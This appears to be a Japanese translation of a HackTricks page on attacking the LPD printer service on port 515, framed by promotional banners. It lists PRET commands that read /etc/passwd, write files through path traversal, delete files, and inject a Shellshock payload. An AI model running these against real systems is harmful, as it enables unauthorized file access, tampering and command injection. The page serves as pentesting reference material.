5.1 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm.
-
**ハッキングのトリックを共有するには、hacktricks repoとhacktricks-cloud repo**にPRを提出してください。
Line Printer Daemon(LPD)プロトコルは、元々80年代のBerkeley Unixで導入されました(後にRFC1179で指定)。
デーモンはポート515/tcpで実行され、lpr
コマンドを使用してアクセスできます。印刷するために、クライアントはジョブ/ユーザー名を定義する制御ファイルと、実際に印刷されるデータを含むデータファイルを送信します。データファイルの入力タイプは、制御ファイルでさまざまなファイル形式の中から選択することで設定できます。ただし、実際に印刷データを処理する方法は、LPDの実装によって異なります。Unixライクなオペレーティングシステムの人気のあるLPD実装はLPRngです。LPDは、悪意のあるPostScriptまたはPJL印刷ジョブを展開するためのキャリアとして使用できます。
lpdprint
とlpdtest
ツールは、PRET**に含まれています。**これらは、LPD対応のプリンタにデータを直接印刷したり、ファイルのダウンロード/アップロード/削除などを行うための最小限の方法です:
lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local
プリンターハッキングについて詳しくは、このページを読んでください。
Shodan
ポート515
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを発見しましょう。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksグッズを手に入れましょう。
-
💬 Discordグループに参加するか、telegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm.
-
**ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。